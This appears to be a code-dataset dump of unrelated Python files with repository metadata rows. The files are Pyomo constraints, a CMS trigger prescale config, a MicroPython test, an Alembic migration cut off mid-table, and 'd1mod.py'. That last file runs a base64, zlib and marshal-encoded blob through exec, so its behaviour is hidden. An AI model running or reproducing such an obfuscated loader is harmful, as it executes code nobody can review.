m.c247 = Constraint(expr=(m.x47 + 5.13435*m.x48)*m.x71 - m.x47 + 1000*m.b30 <= 1000)
m.c248 = Constraint(expr=(m.x47 + 5.13435*m.x48)*m.x72 - 5.13435*m.x48 + 1000*m.b30 <= 1000)
m.c249 = Constraint(expr=(m.x49 + 5.13435*m.x50)*m.x73 - m.x49 + 1000*m.b31 <= 1000)
m.c250 = Constraint(expr=(m.x49 + 5.13435*m.x50)*m.x74 - 5.13435*m.x50 + 1000*m.b31 <= 1000)
m.c251 = Constraint(expr=(m.x51 + 5.13435*m.x52)*m.x75 - m.x51 + 1000*m.b32 <= 1000)
m.c252 = Constraint(expr=(m.x51 + 5.13435*m.x52)*m.x76 - 5.13435*m.x52 + 1000*m.b32 <= 1000)
m.c253 = Constraint(expr=(m.x53 + 5.13435*m.x54)*m.x77 - m.x53 + 1000*m.b33 <= 1000)
m.c254 = Constraint(expr=(m.x53 + 5.13435*m.x54)*m.x78 - 5.13435*m.x54 + 1000*m.b33 <= 1000)
m.c255 = Constraint(expr=(m.x55 + 5.13435*m.x56)*m.x79 - m.x55 + 1000*m.b34 <= 1000)
m.c256 = Constraint(expr=(m.x55 + 5.13435*m.x56)*m.x80 - 5.13435*m.x56 + 1000*m.b34 <= 1000)
m.c257 = Constraint(expr=(m.x57 + 5.13435*m.x58)*m.x81 - m.x57 + 1000*m.b35 <= 1000)
m.c258 = Constraint(expr=(m.x57 + 5.13435*m.x58)*m.x82 - 5.13435*m.x58 + 1000*m.b35 <= 1000)
m.c259 = Constraint(expr=(m.x59 + 5.13435*m.x60)*m.x83 - m.x59 + 1000*m.b36 <= 1000)
m.c260 = Constraint(expr=(m.x59 + 5.13435*m.x60)*m.x84 - 5.13435*m.x60 + 1000*m.b36 <= 1000)
m.c261 = Constraint(expr=(m.x37 + 5.13435*m.x38)*m.x61 - m.x37 - 1000*m.b25 >= -1000)
m.c262 = Constraint(expr=(m.x37 + 5.13435*m.x38)*m.x62 - 5.13435*m.x38 - 1000*m.b25 >= -1000)
m.c263 = Constraint(expr=(m.x39 + 5.13435*m.x40)*m.x63 - m.x39 - 1000*m.b26 >= -1000)
m.c264 = Constraint(expr=(m.x39 + 5.13435*m.x40)*m.x64 - 5.13435*m.x40 - 1000*m.b26 >= -1000)
m.c265 = Constraint(expr=(m.x41 + 5.13435*m.x42)*m.x65 - m.x41 - 1000*m.b27 >= -1000)
m.c266 = Constraint(expr=(m.x41 + 5.13435*m.x42)*m.x66 - 5.13435*m.x42 - 1000*m.b27 >= -1000)
m.c267 = Constraint(expr=(m.x43 + 5.13435*m.x44)*m.x67 - m.x43 - 1000*m.b28 >= -1000)
m.c268 = Constraint(expr=(m.x43 + 5.13435*m.x44)*m.x68 - 5.13435*m.x44 - 1000*m.b28 >= -1000)
m.c269 = Constraint(expr=(m.x45 + 5.13435*m.x46)*m.x69 - m.x45 - 1000*m.b29 >= -1000)
m.c270 = Constraint(expr=(m.x45 + 5.13435*m.x46)*m.x70 - 5.13435*m.x46 - 1000*m.b29 >= -1000)
m.c271 = Constraint(expr=(m.x47 + 5.13435*m.x48)*m.x71 - m.x47 - 1000*m.b30 >= -1000)
m.c272 = Constraint(expr=(m.x47 + 5.13435*m.x48)*m.x72 - 5.13435*m.x48 - 1000*m.b30 >= -1000)
m.c273 = Constraint(expr=(m.x49 + 5.13435*m.x50)*m.x73 - m.x49 - 1000*m.b31 >= -1000)
m.c274 = Constraint(expr=(m.x49 + 5.13435*m.x50)*m.x74 - 5.13435*m.x50 - 1000*m.b31 >= -1000)
m.c275 = Constraint(expr=(m.x51 + 5.13435*m.x52)*m.x75 - m.x51 - 1000*m.b32 >= -1000)
m.c276 = Constraint(expr=(m.x51 + 5.13435*m.x52)*m.x76 - 5.13435*m.x52 - 1000*m.b32 >= -1000)
m.c277 = Constraint(expr=(m.x53 + 5.13435*m.x54)*m.x77 - m.x53 - 1000*m.b33 >= -1000)
m.c278 = Constraint(expr=(m.x53 + 5.13435*m.x54)*m.x78 - 5.13435*m.x54 - 1000*m.b33 >= -1000)
m.c279 = Constraint(expr=(m.x55 + 5.13435*m.x56)*m.x79 - m.x55 - 1000*m.b34 >= -1000)
m.c280 = Constraint(expr=(m.x55 + 5.13435*m.x56)*m.x80 - 5.13435*m.x56 - 1000*m.b34 >= -1000)
m.c281 = Constraint(expr=(m.x57 + 5.13435*m.x58)*m.x81 - m.x57 - 1000*m.b35 >= -1000)
m.c282 = Constraint(expr=(m.x57 + 5.13435*m.x58)*m.x82 - 5.13435*m.x58 - 1000*m.b35 >= -1000)
m.c283 = Constraint(expr=(m.x59 + 5.13435*m.x60)*m.x83 - m.x59 - 1000*m.b36 >= -1000)
m.c284 = Constraint(expr=(m.x59 + 5.13435*m.x60)*m.x84 - 5.13435*m.x60 - 1000*m.b36 >= -1000)
| 47.032595 | 120 | 0.561596 | 7,316 | 36,074 | 2.769136 | 0.062466 | 0.095168 | 0.18066 | 0.074634 | 0.88109 | 0.84555 | 0.84555 | 0.844514 | 0.842144 | 0.69495 | 0 | 0.303117 | 0.212868 | 36,074 | 766 | 121 | 47.093995 | 0.410354 | 0.017353 | 0 | 0.104121 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.002169 | 0 | 0.002169 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
35346ab97188a313a3f6b90ab1eb79b62637e26c | 1,652 | py | Python | L1TriggerConfig/L1GtConfigProducers/python/Luminosity/lumi1x1032/L1Menu2007_PrescaleFactorsAlgoTrig_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | L1TriggerConfig/L1GtConfigProducers/python/Luminosity/lumi1x1032/L1Menu2007_PrescaleFactorsAlgoTrig_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | L1TriggerConfig/L1GtConfigProducers/python/Luminosity/lumi1x1032/L1Menu2007_PrescaleFactorsAlgoTrig_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | import FWCore.ParameterSet.Config as cms
from L1TriggerConfig.L1GtConfigProducers.l1GtPrescaleFactorsAlgoTrig_cfi import *
l1GtPrescaleFactorsAlgoTrig.PrescaleFactorsSet = cms.VPSet(cms.PSet(
PrescaleFactors = cms.vint32(
1000000,
1000000,
100000,
100000,
100000,
100000,
100000,
10000,
10000,
1000,
100,
1,
1,
1,
1,
10000,
1000,
100,
100,
1,
1,
1,
10000,
10000,
100,
1,
1,
1,
10000,
1000,
1000,
1,
1,
1000,
100,
1,
1,
1,
1,
10000,
1,
1,
1,
1,
4000,
2000,
1,
1,
1,
1,
1,
1,
1000,
100,
100,
1,
1,
1,
1,
20,
1,
1,
1,
1,
1,
20,
1,
1,
1,
1,
1,
20,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
100,
1,
1,
1,
1,
1,
1,
1,
10000,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
5000,
1,
1,
1,
1,
1,
1,
1,
1,
1
)
))
| 11.716312 | 81 | 0.264528 | 149 | 1,652 | 2.926175 | 0.174497 | 0.362385 | 0.447248 | 0.477064 | 0.380734 | 0.327982 | 0.261468 | 0.201835 | 0.201835 | 0.130734 | 0 | 0.428571 | 0.648305 | 1,652 | 140 | 82 | 11.8 | 0.321859 | 0 | 0 | 0.925373 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.014925 | 0 | 0.014925 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
10344c8ae30d4b78b36856ae8d2f91789ce3f592 | 179 | py | Python | tests/bytecode/mp-tests/try1.py | LabAixBidouille/micropython | 11aa6ba456287d6c80598a7ebbebd2887ce8f5a2 | [
"MIT"
] | 303 | 2015-07-11T17:12:55.000Z | 2018-01-08T03:02:37.000Z | tests/bytecode/mp-tests/try1.py | roger-/micropython | bad2df3e95cd5719099319d71590a79bf6bc4493 | [
"MIT"
] | 13 | 2016-05-12T16:51:22.000Z | 2018-01-10T22:33:25.000Z | tests/bytecode/mp-tests/try1.py | roger-/micropython | bad2df3e95cd5719099319d71590a79bf6bc4493 | [
"MIT"
] | 26 | 2018-01-18T09:15:33.000Z | 2022-02-07T13:09:14.000Z | def f(x):
try:
f(x)
except:
f(x)
try:
f(x)
except Exception:
f(x)
try:
f(x)
except Exception as e:
f(x, e)
| 12.785714 | 26 | 0.368715 | 26 | 179 | 2.538462 | 0.307692 | 0.212121 | 0.227273 | 0.272727 | 0.863636 | 0.863636 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0.50838 | 179 | 13 | 27 | 13.769231 | 0.75 | 0 | 0 | 0.615385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0 | 0 | 0.076923 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
10beae83ef54e81eda8589dec3cd355a71abf0b2 | 3,408 | py | Python | d1mod.py | mrxD1MOD/reserveIPlockup-x2 | 3b76af641159641719199faa28bfdb2e48a56c3e | [
"MIT"
] | null | null | null | d1mod.py | mrxD1MOD/reserveIPlockup-x2 | 3b76af641159641719199faa28bfdb2e48a56c3e | [
"MIT"
] | null | null | null | d1mod.py | mrxD1MOD/reserveIPlockup-x2 | 3b76af641159641719199faa28bfdb2e48a56c3e | [
"MIT"
] | null | null | null | #ENCRYPT BY D1MOD1877
import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b64decode("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"))))
| 852 | 3,358 | 0.963028 | 114 | 3,408 | 28.789474 | 0.973684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164903 | 0.001761 | 3,408 | 3 | 3,359 | 1,136 | 0.799824 | 0.005869 | 0 | 0 | 0 | 0.5 | 0.974314 | 0.974314 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
5e1f0bc193f2746539b767c1169265e6e6c73ed3 | 43,776 | py | Python | alembic/versions/2a849701bd03_remove_cbs_views_create_tables.py | shaysw/anyway | 35dec531fd4ac79c99d09e684027df017e989ddc | [
"MIT"
] | 69 | 2015-03-30T17:09:46.000Z | 2021-08-15T16:45:47.000Z | alembic/versions/2a849701bd03_remove_cbs_views_create_tables.py | shaysw/anyway | 35dec531fd4ac79c99d09e684027df017e989ddc | [
"MIT"
] | 1,368 | 2015-01-12T16:33:52.000Z | 2022-03-31T21:10:18.000Z | alembic/versions/2a849701bd03_remove_cbs_views_create_tables.py | shaysw/anyway | 35dec531fd4ac79c99d09e684027df017e989ddc | [
"MIT"
] | 277 | 2015-02-16T17:52:06.000Z | 2022-02-16T18:06:44.000Z | """remove cbs views create tables
Revision ID: 2a849701bd03
Revises: 262d7c789220
Create Date: 2020-11-13 20:25:05.729735
"""
# revision identifiers, used by Alembic.
revision = '2a849701bd03'
down_revision = '262d7c789220'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
import geoalchemy2
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.execute("DROP VIEW IF EXISTS involved_markers_hebrew")
op.execute("DROP VIEW IF EXISTS vehicles_markers_hebrew")
op.execute("DROP VIEW IF EXISTS markers_hebrew")
op.execute("DROP VIEW IF EXISTS involved_hebrew")
op.execute("DROP VIEW IF EXISTS vehicles_hebrew")
op.create_table('involved_hebrew',
sa.Column('accident_id', sa.BigInteger(), nullable=False),
sa.Column('provider_and_id', sa.BigInteger(), nullable=True),
sa.Column('provider_code', sa.Integer(), nullable=False),
sa.Column('file_type_police', sa.Integer(), nullable=True),
sa.Column('involved_type', sa.Integer(), nullable=True),
sa.Column('involved_type_hebrew', sa.Text(), nullable=True),
sa.Column('license_acquiring_date', sa.Integer(), nullable=True),
sa.Column('age_group', sa.Integer(), nullable=True),
sa.Column('age_group_hebrew', sa.Text(), nullable=True),
sa.Column('sex', sa.Integer(), nullable=True),
sa.Column('sex_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_type', sa.Integer(), nullable=True),
sa.Column('vehicle_type_hebrew', sa.Text(), nullable=True),
sa.Column('safety_measures', sa.Integer(), nullable=True),
sa.Column('safety_measures_hebrew', sa.Text(), nullable=True),
sa.Column('involve_yishuv_symbol', sa.Integer(), nullable=True),
sa.Column('involve_yishuv_name', sa.Text(), nullable=True),
sa.Column('injury_severity', sa.Integer(), nullable=True),
sa.Column('injury_severity_hebrew', sa.Text(), nullable=True),
sa.Column('injured_type', sa.Integer(), nullable=True),
sa.Column('injured_type_hebrew', sa.Text(), nullable=True),
sa.Column('injured_position', sa.Integer(), nullable=True),
sa.Column('injured_position_hebrew', sa.Text(), nullable=True),
sa.Column('population_type', sa.Integer(), nullable=True),
sa.Column('population_type_hebrew', sa.Text(), nullable=True),
sa.Column('home_region', sa.Integer(), nullable=True),
sa.Column('home_region_hebrew', sa.Text(), nullable=True),
sa.Column('home_district', sa.Integer(), nullable=True),
sa.Column('home_district_hebrew', sa.Text(), nullable=True),
sa.Column('home_natural_area', sa.Integer(), nullable=True),
sa.Column('home_natural_area_hebrew', sa.Text(), nullable=True),
sa.Column('home_municipal_status', sa.Integer(), nullable=True),
sa.Column('home_municipal_status_hebrew', sa.Text(), nullable=True),
sa.Column('home_yishuv_shape', sa.Integer(), nullable=True),
sa.Column('home_yishuv_shape_hebrew', sa.Text(), nullable=True),
sa.Column('hospital_time', sa.Integer(), nullable=True),
sa.Column('hospital_time_hebrew', sa.Text(), nullable=True),
sa.Column('medical_type', sa.Integer(), nullable=True),
sa.Column('medical_type_hebrew', sa.Text(), nullable=True),
sa.Column('release_dest', sa.Integer(), nullable=True),
sa.Column('release_dest_hebrew', sa.Text(), nullable=True),
sa.Column('safety_measures_use', sa.Integer(), nullable=True),
sa.Column('safety_measures_use_hebrew', sa.Text(), nullable=True),
sa.Column('late_deceased', sa.Integer(), nullable=True),
sa.Column('late_deceased_hebrew', sa.Text(), nullable=True),
sa.Column('car_id', sa.Integer(), nullable=True),
sa.Column('involve_id', sa.Integer(), nullable=False),
sa.Column('accident_year', sa.Integer(), nullable=False),
sa.Column('accident_month', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('accident_id', 'provider_code', 'involve_id', 'accident_year')
)
op.create_index(op.f('ix_involved_hebrew_accident_year'), 'involved_hebrew', ['accident_year'], unique=False)
op.create_index(op.f('ix_involved_hebrew_involved_type'), 'involved_hebrew', ['involved_type'], unique=False)
op.create_index(op.f('ix_involved_hebrew_involved_type_hebrew'), 'involved_hebrew', ['involved_type_hebrew'], unique=False)
op.create_index(op.f('ix_involved_hebrew_vehicle_type'), 'involved_hebrew', ['vehicle_type'], unique=False)
op.create_index(op.f('ix_involved_hebrew_vehicle_type_hebrew'), 'involved_hebrew', ['vehicle_type_hebrew'], unique=False)
op.create_table('involved_markers_hebrew',
sa.Column('accident_id', sa.BigInteger(), nullable=False),
sa.Column('provider_and_id', sa.BigInteger(), nullable=True),
sa.Column('provider_code', sa.Integer(), nullable=False),
sa.Column('file_type_police', sa.Integer(), nullable=True),
sa.Column('involved_type', sa.Integer(), nullable=True),
sa.Column('involved_type_hebrew', sa.Text(), nullable=True),
sa.Column('license_acquiring_date', sa.Integer(), nullable=True),
sa.Column('age_group', sa.Integer(), nullable=True),
sa.Column('age_group_hebrew', sa.Text(), nullable=True),
sa.Column('sex', sa.Integer(), nullable=True),
sa.Column('sex_hebrew', sa.Text(), nullable=True),
sa.Column('involve_vehicle_type', sa.Integer(), nullable=True),
sa.Column('involve_vehicle_type_hebrew', sa.Text(), nullable=True),
sa.Column('safety_measures', sa.Integer(), nullable=True),
sa.Column('safety_measures_hebrew', sa.Text(), nullable=True),
sa.Column('involve_yishuv_symbol', sa.Integer(), nullable=True),
sa.Column('involve_yishuv_name', sa.Text(), nullable=True),
sa.Column('injury_severity', sa.Integer(), nullable=True),
sa.Column('injury_severity_hebrew', sa.Text(), nullable=True),
sa.Column('injured_type', sa.Integer(), nullable=True),
sa.Column('injured_type_hebrew', sa.Text(), nullable=True),
sa.Column('injured_position', sa.Integer(), nullable=True),
sa.Column('injured_position_hebrew', sa.Text(), nullable=True),
sa.Column('population_type', sa.Integer(), nullable=True),
sa.Column('population_type_hebrew', sa.Text(), nullable=True),
sa.Column('involve_home_region', sa.Integer(), nullable=True),
sa.Column('involve_home_region_hebrew', sa.Text(), nullable=True),
sa.Column('involve_home_district', sa.Integer(), nullable=True),
sa.Column('involve_home_district_hebrew', sa.Text(), nullable=True),
sa.Column('involve_home_natural_area', sa.Integer(), nullable=True),
sa.Column('involve_home_natural_area_hebrew', sa.Text(), nullable=True),
sa.Column('involve_home_municipal_status', sa.Integer(), nullable=True),
sa.Column('involve_home_municipal_status_hebrew', sa.Text(), nullable=True),
sa.Column('involve_home_yishuv_shape', sa.Integer(), nullable=True),
sa.Column('involve_home_yishuv_shape_hebrew', sa.Text(), nullable=True),
sa.Column('hospital_time', sa.Integer(), nullable=True),
sa.Column('hospital_time_hebrew', sa.Text(), nullable=True),
sa.Column('medical_type', sa.Integer(), nullable=True),
sa.Column('medical_type_hebrew', sa.Text(), nullable=True),
sa.Column('release_dest', sa.Integer(), nullable=True),
sa.Column('release_dest_hebrew', sa.Text(), nullable=True),
sa.Column('safety_measures_use', sa.Integer(), nullable=True),
sa.Column('safety_measures_use_hebrew', sa.Text(), nullable=True),
sa.Column('late_deceased', sa.Integer(), nullable=True),
sa.Column('late_deceased_hebrew', sa.Text(), nullable=True),
sa.Column('car_id', sa.Integer(), nullable=True),
sa.Column('involve_id', sa.Integer(), nullable=False),
sa.Column('accident_year', sa.Integer(), nullable=True),
sa.Column('accident_month', sa.Integer(), nullable=True),
sa.Column('provider_code_hebrew', sa.Text(), nullable=True),
sa.Column('accident_timestamp', sa.DateTime(), nullable=True),
sa.Column('accident_type', sa.Integer(), nullable=True),
sa.Column('accident_type_hebrew', sa.Text(), nullable=True),
sa.Column('accident_severity', sa.Integer(), nullable=True),
sa.Column('accident_severity_hebrew', sa.Text(), nullable=True),
sa.Column('location_accuracy', sa.Integer(), nullable=True),
sa.Column('location_accuracy_hebrew', sa.Text(), nullable=True),
sa.Column('road_type', sa.Integer(), nullable=True),
sa.Column('road_type_hebrew', sa.Text(), nullable=True),
sa.Column('road_shape', sa.Integer(), nullable=True),
sa.Column('road_shape_hebrew', sa.Text(), nullable=True),
sa.Column('day_type', sa.Integer(), nullable=True),
sa.Column('day_type_hebrew', sa.Text(), nullable=True),
sa.Column('police_unit', sa.Integer(), nullable=True),
sa.Column('police_unit_hebrew', sa.Text(), nullable=True),
sa.Column('one_lane', sa.Integer(), nullable=True),
sa.Column('one_lane_hebrew', sa.Text(), nullable=True),
sa.Column('multi_lane', sa.Integer(), nullable=True),
sa.Column('multi_lane_hebrew', sa.Text(), nullable=True),
sa.Column('speed_limit', sa.Integer(), nullable=True),
sa.Column('speed_limit_hebrew', sa.Text(), nullable=True),
sa.Column('road_intactness', sa.Integer(), nullable=True),
sa.Column('road_intactness_hebrew', sa.Text(), nullable=True),
sa.Column('road_width', sa.Integer(), nullable=True),
sa.Column('road_width_hebrew', sa.Text(), nullable=True),
sa.Column('road_sign', sa.Integer(), nullable=True),
sa.Column('road_sign_hebrew', sa.Text(), nullable=True),
sa.Column('road_light', sa.Integer(), nullable=True),
sa.Column('road_light_hebrew', sa.Text(), nullable=True),
sa.Column('road_control', sa.Integer(), nullable=True),
sa.Column('road_control_hebrew', sa.Text(), nullable=True),
sa.Column('weather', sa.Integer(), nullable=True),
sa.Column('weather_hebrew', sa.Text(), nullable=True),
sa.Column('road_surface', sa.Integer(), nullable=True),
sa.Column('road_surface_hebrew', sa.Text(), nullable=True),
sa.Column('road_object', sa.Integer(), nullable=True),
sa.Column('road_object_hebrew', sa.Text(), nullable=True),
sa.Column('object_distance', sa.Integer(), nullable=True),
sa.Column('object_distance_hebrew', sa.Text(), nullable=True),
sa.Column('didnt_cross', sa.Integer(), nullable=True),
sa.Column('didnt_cross_hebrew', sa.Text(), nullable=True),
sa.Column('cross_mode', sa.Integer(), nullable=True),
sa.Column('cross_mode_hebrew', sa.Text(), nullable=True),
sa.Column('cross_location', sa.Integer(), nullable=True),
sa.Column('cross_location_hebrew', sa.Text(), nullable=True),
sa.Column('cross_direction', sa.Integer(), nullable=True),
sa.Column('cross_direction_hebrew', sa.Text(), nullable=True),
sa.Column('road1', sa.Integer(), nullable=True),
sa.Column('road2', sa.Integer(), nullable=True),
sa.Column('km', sa.Float(), nullable=True),
sa.Column('km_raw', sa.Text(), nullable=True),
sa.Column('km_accurate', sa.Boolean(), nullable=True),
sa.Column('road_segment_id', sa.Integer(), nullable=True),
sa.Column('road_segment_number', sa.Integer(), nullable=True),
sa.Column('road_segment_name', sa.Text(), nullable=True),
sa.Column('road_segment_from_km', sa.Float(), nullable=True),
sa.Column('road_segment_to_km', sa.Float(), nullable=True),
sa.Column('road_segment_length_km', sa.Float(), nullable=True),
sa.Column('accident_yishuv_symbol', sa.Integer(), nullable=True),
sa.Column('accident_yishuv_name', sa.Text(), nullable=True),
sa.Column('geo_area', sa.Integer(), nullable=True),
sa.Column('geo_area_hebrew', sa.Text(), nullable=True),
sa.Column('day_night', sa.Integer(), nullable=True),
sa.Column('day_night_hebrew', sa.Text(), nullable=True),
sa.Column('day_in_week', sa.Integer(), nullable=True),
sa.Column('day_in_week_hebrew', sa.Text(), nullable=True),
sa.Column('traffic_light', sa.Integer(), nullable=True),
sa.Column('traffic_light_hebrew', sa.Text(), nullable=True),
sa.Column('accident_region', sa.Integer(), nullable=True),
sa.Column('accident_region_hebrew', sa.Text(), nullable=True),
sa.Column('accident_district', sa.Integer(), nullable=True),
sa.Column('accident_district_hebrew', sa.Text(), nullable=True),
sa.Column('accident_natural_area', sa.Integer(), nullable=True),
